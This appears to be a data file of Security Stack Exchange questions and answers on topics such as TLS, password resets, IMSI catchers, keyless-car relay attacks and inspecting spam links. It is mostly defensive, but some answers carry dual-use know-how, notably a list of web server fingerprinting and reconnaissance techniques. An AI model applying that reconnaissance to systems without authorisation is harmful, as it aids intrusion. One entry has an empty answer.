source_id (int64, 1–4.64M) | question (string, 0–28.4k chars) | response (string, 0–28.8k chars) | metadata (dict) |
---|---|---|---|
117,033 | We have a set of public and private keys and certificates on the server. The problem is that while public-key encryption works fine, the passphrase for the .key file got lost. So, when trying to execute the following command: openssl rsa -in the.key it will obviously ask for the passphrase. Is it possible to get the lost passphrase somehow? | The whole point of having a passphrase is to lock out anyone who does not know it. Allowing it to be recovered would defeat that purpose and allow an attacker who gets hold of your encrypted key file to recover the private key. So no, there is no such thing. What you should do is declare the key as lost to the issuer so that they revoke your certificate. Then, you have to create a new one from scratch. | {
"source": [
"https://security.stackexchange.com/questions/117033",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/103991/"
]
} |
117,059 | C is a rock-solid and widespread programming language that is very popular, especially in the FOSS community. Much security-related software (such as encryption libraries) is written in C and will probably continue to be written in C in the future. One of the main reasons for this is the great performance and portability of C programs.
But the point is that even very experienced software developers can't prevent bugs like buffer overflows. Every year quite a lot of security bugs related to memory management are found in even very popular and well-reviewed software. So my question to you: Is it still a good idea to write security-related software in C nowadays? Or wouldn't it be "security by design" to choose modern languages like Rust or Go, or more high-level languages like Python? | The main and almost only reason why most software in the Linux ecosystem is written in C is tradition. Developers see software written in C and libraries with a C-based API, and thus they use C, because that's convenient. Compilers are already there, and work well because the whole OS is written in C. None of this says that C is good for developing robust software. In fact, C is quite terrible at it. With C, the developer must remain wary of many things at all times. C has many traps ready to be sprung on the smallest mistakes, including: Unchecked array accesses, thus allowing for overflows. Manual memory management, leading to use-after-free or double-free errors, and memory leaks. The dreaded "undefined behaviour" that makes seemingly reasonable expressions run amok (in particular, signed operations that exceed the representable range). Portability issues when going to architectures with different lengths for integer types and pointers. What C is really good at is the following: Interacting with an existing set of libraries that offer a C API. C is the lingua franca that allows interoperability between software components on many platforms. What C is passably good at is: Writing very low-level code (e.g. crypto code resistant to timing attacks through fixed memory access patterns) while trying to keep some level of portability. My conclusion is that C is not a good idea for writing security-related software in general, and has not been so for quite some time already (at least a decade). C is still justified in some specific contexts, in particular if you target embedded platforms (not embedded as in "smartphone", rather embedded as in "smart card"). Instead of looking for reasons to move away from C, it would be more justified to look for specific reasons to keep using C. | {
"source": [
"https://security.stackexchange.com/questions/117059",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91106/"
]
} |
117,068 | According to the ownCloud documentation, if you enable encryption, file sizes can be ~35% larger than their unencrypted forms. From my understanding of encryption, the file sizes should be more-or-less identical (perhaps some padded 0 bits at the end to make it a multiple of the key size). Is that incorrect? If not, why? | Most likely, the encrypted file is base64 encoded, which would account for a 33.3% file-size increase (you encode three bytes of data in four bytes of base64 data). Inserting a new line every 64 characters to make it easier to read (as is done by ASCII armor in openssl, GPG, PGP) will increase the size by a further factor of 65/64. Combining these two effects results in the new file being (4/3)*(65/64) = 135.4% of the size of the original, or an increase in file size of 35.4% (a short sketch verifying this arithmetic follows this entry). I've gone through the calculation in this answer here. You are correct though that encryption should not need to significantly change the file size. It possibly adds a couple of blocks of data if there is a header, an initialization vector/nonce, some padding to make it a full block and/or a MAC to check integrity, though these changes will be insignificant for large files (e.g., adding four blocks to an AES-encrypted file that is 1 MB would make the file 0.006% larger). However, to not increase the file size, you need to be fine with storing and passing around the encrypted data as an arbitrary binary. Arbitrary binaries are often blocked over email to prevent spreading computer viruses, and are often difficult to open outside of hex editors. Base64-encoded files are easier to pass around and are a more portable format than binary files of an unknown file type. | {
"source": [
"https://security.stackexchange.com/questions/117068",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2944/"
]
} |
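The 35.4% figure above can be reproduced in a few lines. The following is an editorial sketch (not part of the original answer): it base64-encodes 1 MB of random bytes standing in for ciphertext and wraps the output at 64 characters the way ASCII armor does; the 1 MB size is an arbitrary choice.

```python
import base64
import os
import textwrap

# Ciphertext is indistinguishable from random bytes, so random data is a fair stand-in.
plain_size = 1_000_000
ciphertext = os.urandom(plain_size)

# Base64 turns every 3 input bytes into 4 output bytes; ASCII armor (openssl, GPG, PGP)
# then inserts a newline every 64 characters, adding another factor of 65/64.
b64 = base64.b64encode(ciphertext).decode("ascii")
armored = "\n".join(textwrap.wrap(b64, 64))

overhead = len(armored) / plain_size
print(f"raw: {plain_size} bytes, armored: {len(armored)} bytes -> "
      f"{overhead:.1%} of the original (expected ~{(4 / 3) * (65 / 64):.1%})")
```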
117,087 | Does SSL certification have anything to do with the website's legitimacy? Are websites which have it under some kind of monitoring? Generally speaking, can a company say they follow the law because their website has SSL certification? | No. You are confusing an SSL / TLS certificate with some kind of standards-compliance certification from either government or industry (ex.: ISO-9000). A TLS Certificate: Is used only for encrypting connections from one computer to another. Links your public key to your server's domain name so that a web browser knows that it is talking to the correct server. To get it, all you have to do is prove that you own the server and the domain name. The people who give out TLS certificates absolutely do not care what you do with the certificate after you have it (that's not their job). A standards-compliance certification: Is used for showing that your company is accountable and trustworthy. Shows that the people in your company follow a set of rules in their day-to-day business (either government rules, or industry rules like an ISO certification). To get it, auditors come to your workplace and observe that your people do things according to the rules. Standards bodies will continue to audit your company, and you can lose your certification if you stop following the rules or do something bad. | {
"source": [
"https://security.stackexchange.com/questions/117087",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104033/"
]
} |
117,131 | I think that it's fundamental for security testers to gather information about how a web application works and eventually what language it's written in. I know that URL extensions, HTTP headers, session cookies, HTML comments and style-sheets may reveal some information but it's still hard and not assured. So I was wondering: is there a way to determine what technology and framework are behind a website? | There's no way to be 100% sure if you don't have access to the server, so it's about guessing. Here are some clues: File extensions: login.php is most likely a PHP script. HTTP headers: they may leak some information about the language which is running on the server, and some additional details like the version: X-Powered-By: PHP/7.0.0 means that the page was rendered by PHP. HTTP Parameter Pollution: if you managed to guess which server is running, you can refine the guess. Language limits: maximum post data, maximum number of variables in GET and POST data, etc. It may be useful if the webmaster kept the default values. Specific input: for example, PHP had some easter eggs. Errors: triggering errors may also leak the language. Warning: Division by zero in /var/www/html/index.php on line 3 is PHP, for example. File uploads: libraries may add metadata if the file is being modified server-side. For example, most sites resize users' avatars, and checking for EXIF data will leak CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), default quality, which may help to guess which language is used. Default filenames: Check if / and /index.php are the same page. Exploits: reading a backup file, or executing arbitrary code on the server. Open source: the website may have been open-sourced and is available somewhere on the Internet. About page: the webmaster may have thanked the language community in a "FAQ" or "About" page. Jobs page: the development team may be recruiting, and they may have detailed the technologies they're using. Social Engineering: ask the webmaster! Public profiles: if you know who is working on the website (check LinkedIn and /humans.txt), you can check their public repos or their skills on online profiles (GitHub, LinkedIn, Twitter, ...). You may also want to know if the website is built with a framework or a CMS, since this will give information about the language used: URLs: directories and pages are specific to certain CMSs. For example, if some resources are located in the /wp-content/ directory, it means that WordPress has been used. Session cookies: name and format. CSRF tokens: name and format. Rendered HTML: for example: meta tag order, comments. Note that all information coming from the server may be altered to trick you. You should always try to use multiple sources to validate your guess. (A short header- and cookie-inspection sketch follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/117131",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70714/"
]
} |
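As an editorial illustration of the header, cookie and HTML clues listed in the answer above, the sketch below fetches a page and prints the most revealing bits. The target URL is a placeholder for a site you are authorised to test, and it assumes the third-party requests package is installed.

```python
import requests

# Placeholder target: only probe hosts you are authorised to test.
TARGET = "https://example.com/"

resp = requests.get(TARGET, timeout=10, allow_redirects=True)

# Headers that commonly leak the server-side language, framework or version.
for header in ("Server", "X-Powered-By", "X-AspNet-Version", "X-Generator", "Via"):
    if header in resp.headers:
        print(f"{header}: {resp.headers[header]}")

# Session cookie names are often framework-specific
# (PHPSESSID -> PHP, JSESSIONID -> Java, ASP.NET_SessionId -> ASP.NET, ...).
for cookie in resp.cookies:
    print(f"cookie: {cookie.name}")

# Rendered-HTML clues: CMS-specific paths and meta generator tags.
body = resp.text.lower()
for clue in ("/wp-content/", "drupal", "joomla", 'name="generator"'):
    if clue in body:
        print(f"HTML clue found: {clue}")
```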
117,311 | I develop my own viruses for 'scientific' purposes, namely to see if they pass the test of Virustotal.com. They all do, except for one or two scanners. Is this considered something you should report to Microsoft/McAfee/etc? If yes, how? | That's a pointless exercise. Most malware scanners match on fragments of binary code (aka virus signatures), and they check MD5 hashes of known infected code against their blacklists. Unless the virus you wrote has been deployed into the wild and is already on their blacklist, there isn't a chance they'll have your code's exact signatures on file. The scanners that do trigger a match are most likely those using heuristics, which scan for "suspicious" behavior. For example, very few programs legitimately need to request the OS grant them the privilege to "Act as a debugger", yet that's fairly common behavior in malware, so if they find it they'll flag it. Reporting your custom viruses to McAfee won't help anyone - not McAfee, not the public. If they don't identify your code as a virus, it's because their scanners don't have very effective heuristics (which they already know, and won't learn from your code among the hundreds of viruses they analyze per day.) And developing a match takes a researcher time and effort, which costs McAfee money. There is no value to McAfee to waste money on researching a virus that nobody can get, and adding it to their blacklists, because as a white hat you won't allow it to be released. | {
"source": [
"https://security.stackexchange.com/questions/117311",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104286/"
]
} |
117,460 | There's been a lot of reporting in the past few years about law enforcement agencies using IMSI catchers (also known as Stingrays after a popular brand of them) to intercept cellular communications. If I understand correctly, what IMSI catchers do is basically a man-in-the-middle (MITM) attack, by insinuating themselves between cell phones and cell towers. However, in the context of the Internet, we've known how to defend against MITM attacks for decades (namely, through public-key cryptography ). Why aren't IMSI catchers rendered ineffective by similar defenses employed in cellular networks? | tl;dr - the protocols were developed prior to MITM being perceived as a threat; the deployed infrastructure now serving billions of cell phones worldwide can't easily be changed to add cell tower validation; and governments have no interest in fixing this issue. Cell phone protocols differ from IP protocols in that they were never a peer-to-peer network of untrusted devices. The original cell phones were analog, with only a small channel of digital data to carry call information. These analog protocols were developed in the 1970s when the micro CPUs had almost no power or storage, and the only security thought was to ensure accurate billing. Also working in the cellular companies' favor, the only equipment authorized to transmit on those frequencies was under full control of the cellular manufacturers; companies like Motorola had a virtual lock on all the equipment on both ends of the call. The protocol they created was such that the cell phones implicitly trust the cell towers for all operational information: signal strength measurements (for optimizing battery life), network IDs (for billing and roaming charges), and encryption requirements (which need to be turned off on a per-jurisdiction basis.) The phone responds with its ID in order to register to receive incoming call information, and the phone company authenticates the ID to ensure proper billing. But in all this, the phone never authenticates the tower. Also, all this metadata is exchanged in cleartext. When digital cellular protocols like GSM arrived, nothing much had changed in the security model. In the 1990s, the main security threat was eavesdroppers, so laws were passed in the US prohibiting listening in on cell calls. Digital voice data was easy to encrypt to protect the privacy of the calls, (supposedly a government agency ensured that weak encryption algorithms were selected.) Otherwise, the existing cellular protocols continued to work without many security issues (security issues primarily being defined by the cellular companies as "people hacking our systems to make free calls".) Stingrays and other IMSI-catchers violate the cell tower agreements by producing an illegal signal, pretending to be a cell tower. They forge a signal strength response of "excellent", which causes the phone to not switch towers. They identify themselves as various common network IDs, so the phones do not switch away to avoid roaming charges. They control the encryption flag, which will cause a phone to downgrade security either to the least secure algorithm, or disable encryption completely. As far as a MITM goes, they may pass along the phone call data to a legitimate tower, or they may simply send back an error code the user sees as a call failure. Nowhere in the protocol designs was a thought given to malicious actors transmitting on their licensed frequencies. 
Illegal use of airwaves has long been a felony, and their original approach was legal: "if someone even tries to spoof a cell phone, we'll have them arrested and locked up for a decade." But it turns out that not everyone is afraid of committing a crime, least of all police departments armed with warrants and Stingrays. Private researchers have also exploited loopholes in the law, where they transmit cell tower signals legally on unlicensed frequencies (the ISM band). This same band happens to be allocated for cell use in foreign countries, so a quad-band phone in the US will happily receive the faked signals. | {
"source": [
"https://security.stackexchange.com/questions/117460",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/32194/"
]
} |
117,475 | If I have a website or mobile app that speaks to the server through a secured SSL/TLS connection (i.e. HTTPS), and I also encrypt the messages sent and received between user and server on top of the already secure connection, am I doing something unnecessary? Or is double encryption a common method? If so, why? | It's not uncommon, but it may not be required. A lot of developers seem to forget that HTTPS traffic is already encrypted - just look at the number of questions about implementing client-side encryption on this website - or feel that it can't be trusted due to well-publicised issues such as the Lenovo SSL MitM mess. However, most people weren't affected by this, and there aren't any particularly viable attacks against TLSv1.2 around at the moment, so it doesn't really add much. On the other hand, there are legitimate reasons for encrypting data before transmission in some cases. For example, if you're developing a storage application, you might want to encrypt using an app on the client side with a key known only to the user - this would mean that the server would not be able to decrypt the data at all, but it could still store it. Sending over HTTPS would mean that an attacker also shouldn't be able to grab the client-encrypted data, but even if they did, it wouldn't matter. This pattern is often used by cloud-based password managers (a brief client-side encryption sketch follows this entry). Essentially, it depends on what you're defending against - if you don't trust SSL/TLS, though, you probably can't trust the encryption code you're sending (in the web application case) either! | {
"source": [
"https://security.stackexchange.com/questions/117475",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/45233/"
]
} |
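To make the storage-application example above concrete, here is an editorial sketch of client-side encryption layered on top of HTTPS: the key never leaves the client, so the server only ever stores ciphertext. It assumes the third-party cryptography package; the HTTPS upload itself is only indicated in a comment, and a real password manager would derive the key from the user's master password rather than generate it randomly.

```python
from cryptography.fernet import Fernet

# The key is generated and kept on the client; the server never sees it.
# A real password manager would derive it from the user's master password
# with a KDF (PBKDF2, scrypt, ...) instead of generating it randomly.
key = Fernet.generate_key()
fernet = Fernet(key)

secret_note = b"login: alice / password: correct horse battery staple"
ciphertext = fernet.encrypt(secret_note)

# Only the ciphertext would be sent over HTTPS, e.g.:
#   requests.post("https://storage.example/api/blobs", data=ciphertext)
# Even if TLS were broken or the server breached, the plaintext stays protected.
print(ciphertext[:40], b"...")

# Decryption happens client-side again after downloading the blob back.
assert fernet.decrypt(ciphertext) == secret_note
```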
117,536 | Let’s say I have never connected to the site example.com . If this site is https and I write https://example.com/supersecretpage will the URL be sent in clear text since it's the first time I connect to the site and therefore the crypto keys were not yet exchanged? If not when does this take place? Could anyone explain the steps when I type that URL? | Short answer: No, the URL is encrypted, but the (sub)domain is sent in plain-text. In your case a (passive) attacker knows that you are connecting to example.com , but it does not know which specific page you are accessing. In short there are three times where an attacker can get information about the site you are accessing (ordered chronological): (Sub)domain in the DNS query (Sub)domain in the Client Hello (SNI) (Sub)domain in server certificate However the... URL is sent encrypted via TLS For more details read the explanation below. Explanation Note: When I am writing "(sub)domain" I mean both the domain ( example.com ) and the subdomain ( mydomain.example.com ). When I only write "domain" I really only mean the domain ( example.com ) without the subdomain. Basically what happens is: You type in https://example.com/supersecretpage . The browser submits the (sub)domain in a special TLS extension (called SNI ) At some point the browser gets the SSL certificate from the server. Depending on the certificate* this also includes the subdomain you're connecting to, but it may also include more than one subdomain and even more than one domain. So in fact the cert of example.com may also include www.example.com , devserver.example.com and how-to-develop-tls.example . These entries are called Subject Alternative Names and the cert is valid for all of them. After the client verified the certificate and the client & server choose a cipher the traffic is encrypted . After all this happened a "usual" HTTP request is send (over the secured TLS channel). This means this is the first time in the whole request where the full URL appears. The request e.g. looks like this: GET /supersecretpage HTTP/1.1 Host: example.com [...] * If the certificate is a wildcard certificate it does not include the subdomains, but just *.example.com . Another thing is worth mentioning: Before the connection can be established at all the client needs to resolve the DNS name. To do this it sends unencrypted DNS queries to a DNS server and these ones also contain the (sub)domain , which can therefore be used by an attacker to see the visited domains. However this does not always have to happen in this way, because you assume the user manually types in https://example.com/supersecretpage into the URL bar. But this is very rare as most users e.g. would rather type in example.com/supersecretpage . Another issue would be visitors clicking on an insecure link , which uses HTTP - in contrast to a secure HTTPS-link ). Such links could e.g. be old links created when the site did not support HTTPS or did not redirect to HTTPS by default.
You ask why this matters? In such a (usual) case there is no https:// in the URL. When no protocol is entered into the URL bar, all browsers internally "convert" this URL to http://example.com/supersecretpage (note the http:// there) as they cannot expect the server to support HTTPS.
This means the browser first tries to connect to the website using insecure HTTP, and only after the website sends a (301) redirect to the HTTPS URL does it use the secure mode. In this case the attacker can see the full URL in the unencrypted HTTP request. You can easily test this yourself by looking into the "network panel" of your browser, where you should see this "HTTPS upgrade". However, note that there are techniques to prevent this insecure first HTTP request. Most notably HSTS and - to protect even the first connection you make to the site - HSTS preloading, but also HTTPS Everywhere helps against such attacks. FYI: According to Netcraft, 95% of all HTTPS servers were vulnerable to such (SSL stripping) attacks as of March 2016. (A short sketch after this entry shows which parts of the request travel in the clear.) | {
"source": [
"https://security.stackexchange.com/questions/117536",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104545/"
]
} |
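The split described above - hostname visible via SNI, path hidden inside the TLS channel - can be observed with the Python standard library alone. This editorial sketch connects to example.com and only then sends the /supersecretpage request over the encrypted socket.

```python
import socket
import ssl

host, path = "example.com", "/supersecretpage"

# The hostname is handed to the TLS layer (server_hostname -> SNI), so a passive
# observer of the ClientHello can see it. The path never appears there.
ctx = ssl.create_default_context()
with socket.create_connection((host, 443), timeout=10) as raw_sock:
    with ctx.wrap_socket(raw_sock, server_hostname=host) as tls_sock:
        print("negotiated:", tls_sock.version(), tls_sock.cipher()[0])

        # The full URL (i.e. the path) is only sent here, inside the encrypted channel.
        request = (
            f"GET {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Connection: close\r\n\r\n"
        )
        tls_sock.sendall(request.encode("ascii"))
        status_line = tls_sock.recv(4096).split(b"\r\n", 1)[0]
        print("response status:", status_line.decode("ascii", "replace"))
```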
117,605 | I have a student loan account with a company, not the biggest company but big enough that they should have their act together. Today I couldn't remember my password to log into my account dashboard. I clicked "forgot password" and they prompted me with 5 questions: first name, last name, last 4 digits of my SSN, birthday, and zip code. All information that is easily acquirable if trying hard enough, not to mention all information that is included in their periodic emails about payments. Upon typing in the information, the site responds saying I have been authenticated and gives me my password in plaintext. So now not only is it incredibly easy to retrieve lost password details, they don't even send it to your email, they just display it on screen; on top of that, they store the password in plaintext in the database. This is an account that has details of my multi-thousand dollar loan as well as my bank details for auto-payments. Fortunately the one detail not given is my username, which is my full SSN, so that is the last thread of security; however, if they store passwords unhashed I'm sure my SSN is not hashed either, making this even worse. So my question is, given that this is a loan that I can't just up and leave, what precautions or steps can I take to make this potentially more secure? Would it be worth emailing them and badgering them to upgrade their security, or should I just pay as quickly as possible and get out? If I do warn them, what types of threat should I say they are vulnerable to in the hope of scaring them into a patch? | If you are concerned about the privacy of your password and thus your account (which should be the case), you should try to educate their customer service. The developer FAQ from the public shaming project for this kind of recklessness lists a few good points and is worth a read. Also, you should point out that you feel insecure and have lost trust in the company, and that you will hold them liable for any problems that stem from this no-go. You should also document that behaviour and try to get a written statement of their point of view if they do not see a reason to fix this. Thus, if any problems arise, it will make the whole thing easier for you from a legal point of view. Besides that, by submitting the site to plaintext offenders, you will provide a third-party point of view, which might help your case. Also, I assume you use a secure unique password for that site and hopefully have always done so. If not, treat this as a regular leak, changing all your passwords (and on that occasion, make sure to use unique passwords for each service). | {
"source": [
"https://security.stackexchange.com/questions/117605",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/83603/"
]
} |
117,696 | The German automobile club ADAC did a test with several cars which open doors and start the engine with a "keyless entry" system. You don't have to push a button on your car key. If you get near your car, key and car will recognise each other. If you pull the door handle the car will open. Inside the car you push the ignition button and the engine starts. The security relies on the distance between key and car. Car thieves have built a repeater to tunnel the radio signals over long distances. One thief stands near the key and the other near the car. Then the car will open. The distance between car and key can easily be several hundred meters. Lots of cars are stolen this way. How could car manufacturers solve this problem, or is this an
unpatchable design flaw? Are there any mitigations a car owner could
put in place? What should wireless physical access control look like for cars? | From a layman's point of view: yes, it's a design flaw, and yes, the signals are boosted to unlock the cars from far, far away. This is known as a Relay Station Attack (RSA). Some of the ways to mitigate such attacks are: measuring group delay time to detect illegally high values; measuring the third-order intercept point to detect illegal intermodulation products; measuring the field strength of the electric field; measuring the response time of the 125 kHz LC circuit; using a more complex modulation (i.e. quadrature amplitude modulation) which can't be demodulated and re-modulated by a simple relay station; putting a physical on/off switch on the key. I don't think these mitigations can be used by car owners themselves, as there is quite a lot of technical detail behind them. Taken from Wikipedia: Smart keys and Security requirements. | {
"source": [
"https://security.stackexchange.com/questions/117696",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104357/"
]
} |
117,706 | Just for a brief overview. I have a system that can generate invoices and has a login system for a user to generate his/her invoices. Let's say the platform resides at /platform and the invoices in /platform/invoices and the platform is at the domain www.example.com. People can log in and generate their invoices, which effectively generates the invoice in the invoices folder and then, via the url www.example.com/invoices/invoicename.pdf, downloads the file. The invoices folder is publicly accessible to allow the system to grab the file. However if for example clientA navigated to www.example.com/invoices/invoicename-ownedbyclientB.pdf he would be able to download an invoice that did not belong to him. I can certainly do things to mitigate this such as deleting the invoice after generation and downloads to keep the folder clean, disallow index on directories to stop easy navigation, change the system so that files are sent via email as opposed to downloaded to a system directory. On the system side I can easily limit what people have access to as they are authenticated, but what would be the best way to deal with the above situation? I have considered using htaccess or similar in this directory to ensure that calls originate from the server itself (I haven't checked if this is possible, just an assumption at the moment). | | {
"source": [
"https://security.stackexchange.com/questions/117706",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104715/"
]
} |
117,730 | What's wrong with generating a password for you without storing it? Like, why is MasterCard on the plain text offenders list? | Because most users do not change their password after such a reset and mindlessly instruct their browser to save the new password, and/or the site does not force users to change it after their first login. Thus they effectively send the new password in plain text, and thus they are offenders. A better way may be a one-time token for a password reset, preferably sent via snail mail or SMS. | {
"source": [
"https://security.stackexchange.com/questions/117730",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
117,740 | Over the last few weeks, I've gotten several spam emails from different friends that only contained links to different websites. I would like to click on those links and see what's on the website. My reasons are curiosity, the ability to understand how dangerous the website might be, and to differentiate between a product-spam email ("Buy product XYZ!") and a website that tries to do something dangerous to a computer. I do not intend to use a production system, a system with my personal data on it, or something I am not willing to lose in the process; I am really just curious. So what measures would I need to take in order to safely 1 click on those links? My ideas so far are: Virtual Machine Disable Flash, Java, JavaScript 2 , ... in the browser Having an up-to-date OS / Antivirus Use NoScript Use external websites that check the linked website like: http://www.antihacksecurity.com/scan-a-website-for-virus-malware (link seems down?) beforehand Footnotes: I am almost certain that there is no way to really safely click those links, so maybe this should be called "minimize the risk when you..." I am aware that disabling stuff might not give me a complete and real picture of the website, since I might not experience the intended effect and think "It's safe." | VPN Virtual Machine View-Source for those who know Javascript [Tinfoil Hat (Mythic Warforged)] here. If you are handy with Javascript and the like, I've always appreciated view-source:http://www.webaddress.com/ from the URL bar. For added tinfoil, do it behind a VPN, and a Virtual Machine. The VPN is necessary just in case the attacker expects you to visit personally from your actual IP address. Your access attempt will show up in the visitor logs, but if they just get a random VPN, then Ho Ho Howned. And the Virtual Machine is, of course, there to prevent strange attacks against the view-source page, which may or may not exist. It will not help against VM-escaping thingmabobs. Alternatively, you can programmatically open a socket connection (be wary of vulnerabilities in your chosen language) while behind a VPN, and use GET /page.html HTTP/1.0 to grab the HTML page, and then do the same for accompanying Javascript (a minimal socket-fetch sketch follows this entry). Look for funny things like zzz.saveToFile(), which usually indicates a drive-by download attempt. Same with intentionally obfuscated Javascript; it should not be trusted. Keep in mind that minification and obfuscation are two different things. Developer Console Watching (F12) If you are handy with web development, and you want to see exactly what kind of odd funkiness is going on without having to completely follow the script line-by-line, then you can monitor changes as they happen with the developer console. This allows you to load the results of off-site/off-page Javascript that is generated dynamically. Temporary Folder Watching This is assuming you're behind a virtual machine. Obviously, you would not want to try this on your main machine. Don't forget your temporary folder, which is usually %TEMP%. With drive-by downloads, they usually start saving executables to %TEMP%. You can see if such a thing occurs when you visit a page. They can be saved as .tmp files, which are later renamed to .exe. This is usually discovered by a function that looks like x.saveToFile(). Reset your Virtual Machine when you're done Don't forget to reset your VM's state/snapshot afterwards. You don't want to be infected long-term. | {
"source": [
"https://security.stackexchange.com/questions/117740",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/99028/"
]
} |
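The "open a socket connection and use GET /page.html HTTP/1.0" suggestion above can look like the following editorial sketch. It fetches the raw HTML without rendering anything or executing any JavaScript; the host and path are placeholders, and per the answer it should only be run from a disposable VM, ideally behind a VPN.

```python
import socket

# Placeholders: substitute the link from the spam mail, and only run this
# from a disposable VM (ideally behind a VPN), as described above.
host, path = "example.com", "/"

# A bare HTTP/1.0 GET: the page source arrives as text, nothing is rendered
# and no script is executed. Inspect the output for obfuscated JavaScript,
# saveToFile()-style calls, suspicious iframes, and so on.
request = f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")

with socket.create_connection((host, 80), timeout=10) as sock:
    sock.sendall(request)
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:
            break
        chunks.append(data)

print(b"".join(chunks).decode("utf-8", errors="replace"))
```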
117,854 | For my project I need a " forgot password " functionality. I am not quite sure how to implement this kind of functionality yet so I was hoping to find some "best practice" on the internet but couldn't find anything useful that treats every important aspect of this quite common feature. My own thoughts about this are rather straight forward: If a user wanted to change his password I could create a unique token uniqueTokenForTheUser attached to a "change password request" which would be essentially the identifier for my backend to tell if it was the right user who sent the request. So for example I'd generate/send an email to [email protected] with a link http://www.example.com/changePassword?token=uniqueTokenForTheUser uniqueTokenForTheUser would be stored in a table that gets checked by a thread in a certain interval and removes the record once the token is expired in case the user did not actually change his password. Although this sounds rather straightforward to me, I wanted to double-check if there were any "best practices" out there e.g. when it comes to generation and deletion of that particular token. Any suggestions or references to articles/tutorials are welcome! Additional links suggested by comments: The definitive guide to form-based website authentication (Thanks to Krumia) | Use HTTPS only for this, and then we'll get onto details of implementation. First of all you're going to want to protect against user enumeration . That is, don't reveal in the page whether the user exists or not. This should only be disclosed in the email itself. Secondly you will want to avoid referrer leakage . Ensure no external links or external resources are present on your target link. One way to mitigate this is to redirect after the initial link is followed so that the token is no longer in the query string. Be aware that if something goes wrong (e.g. your database is briefly down), and a standard error template is shown, then this may cause the token to be leaked should it contain any external references. Generate a token with 128bits of entropy with a CSPRNG. Store this server-side using SHA-2 to prevent any data leakage vulnerabilities on your reset table from allowing an attacker to reset passwords. Note that salt is not needed. Expire these tokens after a short time (e.g. a few hours). As well as providing the non-hashed token to the user in the email link, give the option for the user to navigate to the page manually and then paste in the token value. This can prevent query string values from being logged in browser history, and within any proxy and server logs by default. Optionally you may want to make sure that the session identifier for the session that initiated the password reset is the one that followed the link . This can help protect an account where the attacker has access to the user's email (e.g. setting up a quick forward all rule with limited access to the email account). However, all this really does is prevent an attacker from opportunistically following a user requested reset - the attacker could still request their own reset token for the victim should they want to target your particular site. Once the password has been reset to one of the user's choice, you will need to expire the token and send the user an email to let them know this has happened just in case an attacker has somehow managed to reset their password (without necessarily having control of their mail account) - defence in depth. 
You should also rotate the current session identifier and expire any others for this user account. This negates the need for the user to log in again, whilst also clearing any sessions ridden by an attacker, although some users like to have the site log them out so they get a comfort blanket of confirmation that their password has actually been reset. Redirecting to the login page also gives some password managers the chance to save the login URL and the new password, although many already detect the new password from the reset page. You may also wish to consider other out-of-band options for the reset mechanism and the change notifications, for example SMS or mobile phone alerts. (A short token-handling sketch follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/117854",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70899/"
]
} |
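A minimal editorial sketch of the token handling recommended above, using only the Python standard library: 128 bits from a CSPRNG, only a SHA-256 digest stored server-side, a short expiry, single use, and a constant-time comparison. The in-memory "table" and the URL are illustrative stand-ins, not part of the original answer.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 2 * 60 * 60        # expire reset tokens after a couple of hours
reset_table = {}                       # stand-in for a real database table

def create_reset_token(user_id: str) -> str:
    """Generate a 128-bit token; store only its SHA-256 digest plus an expiry."""
    token = secrets.token_urlsafe(16)  # 16 bytes = 128 bits from a CSPRNG
    digest = hashlib.sha256(token.encode()).hexdigest()
    reset_table[user_id] = (digest, time.time() + TOKEN_TTL_SECONDS)
    return token                       # goes into the emailed link, never stored in clear

def verify_reset_token(user_id: str, presented: str) -> bool:
    """Single use: the record is removed on any attempt; compare in constant time."""
    record = reset_table.pop(user_id, None)
    if record is None:
        return False
    digest, expires_at = record
    if time.time() > expires_at:
        return False
    presented_digest = hashlib.sha256(presented.encode()).hexdigest()
    return hmac.compare_digest(digest, presented_digest)

token = create_reset_token("alice")
print("emailed link: https://www.example.com/changePassword?token=" + token)
print("token accepted?", verify_reset_token("alice", token))
```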
117,879 | I've read this question and to quote from the accepted answer Besides that, by submitting the site to plaintext offenders, you will provide a third-party point of view, which might help your case. But, isn't submitting a website to plaintext offenders putting yourself at more risk? Someone with malicious intent could see the website you submitted to plaintext offenders and then go try to exploit the vulnerability, putting yourself (and anyone else using that site) at more of a risk. Or am I just missing something? | To quote their FAQ : Aren’t you worried hackers will use your site to find targets? Yes, but less worried than having this information remain secret and relying on Security Through Obscurity. To be more verbose: There are two possible outcomes from submitting a site there: They fix it - This is more likely to happen when they get publicly shamed. The attack probability increases, too. Also, hiding security problems away (leaving it secure only as long as it is kept secret) rather than fixing them is generally considered a security antipattern, as the NIST "Guide to General Server Security" states: "System security should not depend on the secrecy of the implementation or its components." They do not fix it - Then it is at least documented publicly and externally. To be more specific, thanks to Chris Cirefice who pointed out it the comments more explicitly what I had in mind: "documented publicly and externally" - with timestamps . So if a student loan company is hacked and the students' bank details are released due to lack of compliance with (U.S.) government policies, e.g. the Gramm-Leach-Bliley Act 1 2, the students could sue the company, and the timestamps of public release of failure to comply would be great evidence in court for recompense. | {
"source": [
"https://security.stackexchange.com/questions/117879",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/72375/"
]
} |
